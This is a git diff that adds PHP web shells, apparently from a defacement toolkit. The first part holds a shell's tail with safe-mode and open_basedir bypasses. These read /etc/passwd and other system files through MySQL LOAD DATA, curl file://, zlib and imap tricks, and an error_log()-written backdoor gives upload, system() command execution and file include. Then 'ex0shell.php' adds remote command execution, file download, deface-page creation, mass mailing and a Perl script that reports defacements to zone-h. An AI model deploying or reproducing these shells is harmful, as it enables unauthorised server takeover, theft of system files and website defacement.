+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
+$mysql_files = explode(':', $mysql_files_str);
+
+$sql = array (
+"USE $mdb",
+'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
+"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
+. "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+. "ESCAPED BY          '' "
+. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+"SELECT a FROM $tbl LIMIT 1"
+);
+mysql_connect ($mhost, $muser, $mpass);
+
+								foreach ($sql as $statement) {
+								   $q = mysql_query ($statement);
+
+								   if ($q == false) die (
+								      "FAILED: " . $statement . "\n" .
+								      "REASON: " . mysql_error () . "\n"
+								   );
+
+								   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
+
+								   echo htmlspecialchars($r[0]);
+								   mysql_free_result ($q);
+								}
+echo "</textarea>";
+}
+// ERORR //
+if(empty($_POST['ER'])){
+} else {
+$ERORR=$_POST['ER'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * erne   * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#D0D0D0' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  erne </font></center></td>
+</tr>
+</table>
+<font color='#9C9C9C'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+}
+?>
+<form method='POST' enctype='multipart/form-data' >
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  >
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' >
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+
+// id //
+if ($_POST['plugin'] ){
+echo "read file id" ,"<br>";
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+
+
+
+                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "\n";
+                                                }
+                                        }
+                                 echo "</textarea>";
+                                break;
+
+
+                                             }
+
+
+// CURL //
+if(empty($_POST['curl'])){
+
+} else {
+echo "read file CURL","<br>" ;
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+echo "</textarea>";
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+echo "read file copy" ,"<br>";
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+echo "</textarea>";
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+/// ini_restore //
+if(empty($_POST['M2'])){
+} else {
+echo "read file ini_restore","<br> ";
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+$m=$_POST['M2'];
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+$s=readfile("$m");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+$s=readfile("$m");
+echo "</textarea>";
+}
+
+// imap //
+
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+echo "read file imap" ,"<br>";
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+echo "</textarea>";
+} elseif ($string && $switch == "dir") {
+echo "read  dir imap","<br>" ;
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+echo "</textarea>";
+}
+$tb->tdbody ("</td></tr></table>");
+// open dir //
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top');
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
+
+if(empty($_POST['m'])){
+echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
+<table id=tb><tr><td><FONT COLOR=\"#9B9B9B\">path dir</FONT>
+<INPUT type='text' name='m' size=70 value='./'>
+<INPUT type='submit' value='show' id=input></td></tr></table></form></div>";
+
+} else {
+$m=$_POST['m'];
+$spath = $m ;
+$path = $m ;
+
+
+
+
+        $method = intval(trim($_POST['method']));
+
+        $handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+        while (false !== ($file = readdir($handle)))
+        {
+                $full_path = "$path/$file";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0777'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+        closedir($handle);
+        clearstatcache();
+
+
+
+        echo '<strong><FONT COLOR=#9B9B9B>The folders is 777 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0755'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 755 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0644'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 644 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0750'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 750 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0604'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 604 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0705'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 705 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0606'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 606 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+//////////
+$handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+                if ((is_dir($full_path)) && ($perms == '0703'))
+                {
+                        if (!file_exists('.*')) {
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+                        }
+                }
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>The folders is 703 :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+
+
+
+  }
+    $handle = opendir($path);
+
+        $_folders = array();
+
+        $i = 0;
+
+ while (false !== ($file1 = readdir($handle)))
+        {
+                $full_path = "$path/$file1";
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4);
+
+
+
+
+                                $_folders[$i] = $file1;
+
+                                $i++;
+
+
+        }
+
+
+
+        clearstatcache();
+
+
+
+        echo '</FONT><strong><FONT COLOR=#9B9B9B>www.alturks.com :</strong><br />';
+
+        foreach ($_folders as $folder)
+        {
+                echo $folder.'<br />';
+        }
+
+        echo '</FONT><strong><FONT COLOR=#9C9C9C>ernealizm: </strong>'.$i.'</FONT><br />';
+$tb->tdbody ("</td></tr></table>");
+
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top');
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
+
+
+  error_reporting(E_WARNING);
+  ini_set("display_errors", 1);
+
+  echo "<head><title>".getcwd()."</title></head>";
+
+  echo "<form method=POST>";
+  echo "<div style='float: left'><FONT COLOR=\"#9B9B9B\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>";
+  echo "<input type=submit value='--&raquo;'></form>";
+
+
+
+  // break fucking safe-mode !
+
+  $root = "/";
+
+  if($_POST['root']) $root = $_POST['root'];
+
+  if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#9B9B9B'>Safe-mode is OFF.</font>");
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
+  $c = 0; $D = array();
+  set_error_handler("eh");
+
+  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+
+  for($i=0; $i < strlen($chars); $i++){
+  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
+
+  $prevD = $D[count($D)-1];
+  glob($path."*");
+
+        if($D[count($D)-1] != $prevD){
+
+        for($j=0; $j < strlen($chars); $j++){
+
+           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
+
+           $prevD2 = $D[count($D)-1];
+           glob($path."*");
+
+              if($D[count($D)-1] != $prevD2){
+
+
+                 for($p=0; $p < strlen($chars); $p++){
+
+                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
+
+                 $prevD3 = $D[count($D)-1];
+                 glob($path."*");
+
+                    if($D[count($D)-1] != $prevD3){
+
+
+                       for($r=0; $r < strlen($chars); $r++){
+
+                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
+                       glob($path."*");
+
+                       }
+
+                    }
+
+                 }
+
+              }
+
+        }
+
+        }
+
+  }
+
+  $D = array_unique($D);
+
+
+  foreach($D as $item) echo "{$item}\n";
+
+
+
+
+
+  function eh($errno, $errstr, $errfile, $errline){
+
+     global $D, $c, $i;
+     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
+     if($o){ $D[$c] = $o[2]; $c++;}
+
+  }
+  echo "</textarea>";
+$tb->tdbody ("</td></tr></table>");
+?>
diff --git a/php/ex0shell.php b/php/ex0shell.php
new file mode 100644
index 0000000..9f2819b
--- /dev/null
+++ b/php/ex0shell.php
@@ -0,0 +1,601 @@
+<?               
+/*########################################### 
+exoshell volume 2.1S
+
+Maked In Turk Edited And Translated By KingDefacer
+###########################################*/
+
+error_reporting(0); 
+set_magic_quotes_runtime(0);
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
+if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
+elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
+else{return $requ."?".$link."=".$val;}}
+function delm($delmtxt){print"<center><table bgcolor=Black  style='border:1px solidDeepSkyBlue  ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
+function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
+$nscmd=htmlspecialchars($scmd);print $nscmd;}
+elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
+$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
+elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
+while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
+print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ 
+ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
+ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
+print htmlspecialchars($pret);}}
+function input($type,$name,$value,$size)
+{if (empty($value)){print "<input type=$type name=$name size=$size>";}
+elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
+elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
+else {print "<input type=$type name=$name value=$value size=$size >";}}
+function permcol($path){if (is_writable($path)){print "<font color=red>";
+callperms($path); print "</font>";}
+elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue  >";
+callperms($path); print "</font>";}
+else {print "<font color=DeepSkyBlue >";callperms($path);}}
+if ($dlink=="dwld"){download($_REQUEST['dwld']);}
+function download($dwfile) {$size = filesize($dwfile);
+@header("Content-Type: application/force-download;name=$dwfile");
+@header("Content-Transfer-Encoding: binary");
+@header("Content-Length: $size");
+@header("Content-Disposition: attachment; filename=$dwfile");
+@header("Expires: 0");
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Pragma: no-cache");
+@readfile($dwfile); exit;}
+?> 
+<html> 
+<head><title>ex0shell Shell & Edited By KingDefacer</title></head>
+<style> 
+BODY {font-family:tahoma; SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; } 
+a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
+a:hover{color:red}
+input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
+textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
+div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue  smoke}
+select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style> 
+<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3> 
+</body> 
+</html> 
+<?
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
+$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=DeepSkyBlue  >";$efnt="</font>";
+################# Ending of common variables ########################
+
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue   size=6>    ## ex0 shell EDITED BY KingDefacer ## 
+</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
+print " - <a href='javascript:history.back()'>Back</a>";
+print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
+if ($dlink=='phpinfo'){print phpinfo();die();}
+print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
+print " - <a href=".inclink('dlink', 'urld').">Url decode</a>"; 
+print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>"; 
+print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
+print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Check permissions</a>";
+print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
+print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
+print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
+print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
+print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
+if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));  
+print "<p>Result is : $sfnt".$cbase."$efnt";  die();}
+if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>"; 
+print $sf;input ("text","ncbase",$ncbase,35);print " "; 
+input ("submit","","Decode","");print $ef; die();}
+if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));  
+print "<p>Result is : $sfnt".$urldc."$efnt";  die();}if ($dlink=='urld'){
+print "<p><b>[ Url - Decoder ]</b>";   print $sf;
+input ("text","nurld",$nurld,35);print " "; 
+input ("submit","","Decode","");print $ef; die();}
+if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));  print "<p>Result is : $sfnt".$urlenc."$efnt";  die();}
+if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";   
+print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
+if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));  
+print "<p>Result is : $sfnt".$mdfe."$efnt";  die();}if ($dlink=='mdf'){ 
+print "<p><b>[ MD5 - Encoder ]</b>"; 
+print $sf;input ("text","nmdf",$nmdf,35);print " ";
+input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
+print "<pre>";print "<p><textarea cols=120 rows=12>";
+if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
+}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
+}print "</textarea>";print "</pre>";die();}
+function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
+print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
+elseif(isset($showsc)&&filesize($showsc) !=="0") {
+print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
+if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
+print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
+input ("text","showsc","",35);print " ";
+input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
+if ($dlink=='cmdhlp'){
+print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
+input ("text","hlp","",35);print " "; 
+input ("submit","","Help","");print $ef; die();}
+if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
+print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
+$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
+if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
+if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
+{if (touch ($_REQUEST['indx'])==true){
+$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
+fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
+] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
+if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
+Your index contents here</textarea></p>";
+input ("text","indx","Index-name",35);print " ";
+input ("submit","qindsub","Create","");print $ef;die();}
+if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
+$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
+if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
+if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
+Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
+input ("submit","mailsub","Send-mail","");print $ef;die();}
+if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
+function callzone($nscdir){
+if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
+else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
+fwrite ($fpz,"\$arq = @ARGV[0];
+\$grupo = @ARGV[1];
+chomp \$grupo;
+open(a,\"<\$arq\");
+@site = <a>;
+close(a);
+\$b = scalar(@site);
+for(\$a=0;\$a<=\$b;\$a++)
+{chomp \$site[\$a];
+if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
+print \"[+] Sending \$site[\$a]\n\";
+use IO::Socket::INET;
+\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
+print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
+print \$sock \"Accept: */*\r\n\";
+print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
+print \$sock \"Accept-Language: pt-br\r\n\";
+print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
+print \$sock \"Connection: Keep-Alive\r\n\";
+print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
+print \$sock \"Host: old.zone-h.org\r\n\";
+print \$sock \"Content-Length: 385\r\n\";
+print \$sock \"Pragma: no-cache\r\n\";
+print \$sock \"\r\n\";
+print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
+close(\$sock);}");
+if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
+}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "[ Can't complete the operation !! ]";}
+else {callfuncs("chmod 777 $zpl;chmod 777 $li");
+ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
+print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
+}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
+print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
+www.site1.com
+www.site2.com
+</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
+input ("submit","zonesub","Send","");print $ef;die();}
+print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+function inisaf($iniv) { $chkini=ini_get($iniv);
+if(($chkini || strtolower($chkini)) !=='on'){print"<font color=green ><b>OFF ( NOT SECURITY )</b></font>";} else{
+print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
+if ($chkin==""){print " <font color=red><b>None</b></font>";}
+else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue  >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
+elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
+while (!feof($opop)){ $nval= fgetc($opop);}}
+elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
+ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
+if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
+else{print"<font color=DeepSkyBlue  ><b>OFF</b></font>";} }
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; 
+print"<tr><td>"; print"<center><br>";
+print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>"; 
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>"; 
+print "<div align=center>"; print"<br><b>Mysql : </b>"; 
+callocmd('which mysql','/usr/bin/mysql'); 
+print"</td>"; print"<td>"; print"<br><b>Perl : </b>"; 
